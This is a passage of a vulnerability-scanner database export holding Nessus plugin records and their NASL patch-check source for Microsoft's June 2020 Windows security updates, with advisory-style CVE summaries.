severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561612, 4561674])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:14", "description": "The remote Windows host is missing security update 4561673\nor cumulative update 4561666. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1269)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561673: Windows 8.1 and Windows Server 2012 R2 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-0916", "CVE-2020-1220", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1311", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1216", "CVE-2020-1247", "CVE-2020-1246", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1196", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1270", "CVE-2020-1291", "CVE-2020-1260"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561666.NASL", "href": "https://www.tenable.com/plugins/nessus/137262", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137262);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561673\");\n script_xref(name:\"MSKB\", value:\"4561666\");\n script_xref(name:\"MSFT\", value:\"MS20-4561673\");\n script_xref(name:\"MSFT\", value:\"MS20-4561666\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n\n script_name(english:\"KB4561673: Windows 8.1 and Windows Server 2012 R2 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561673\nor cumulative update 4561666. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1269)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1334)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4561673/windows-8-1-kb4561673\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4561666/windows-8-1-kb4561666\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561673 or Cumulative Update KB4561666.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561666',\n '4561673'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561666, 4561673])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:14", "description": "The remote Windows host is missing security update 4561649.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1334)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1278)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do 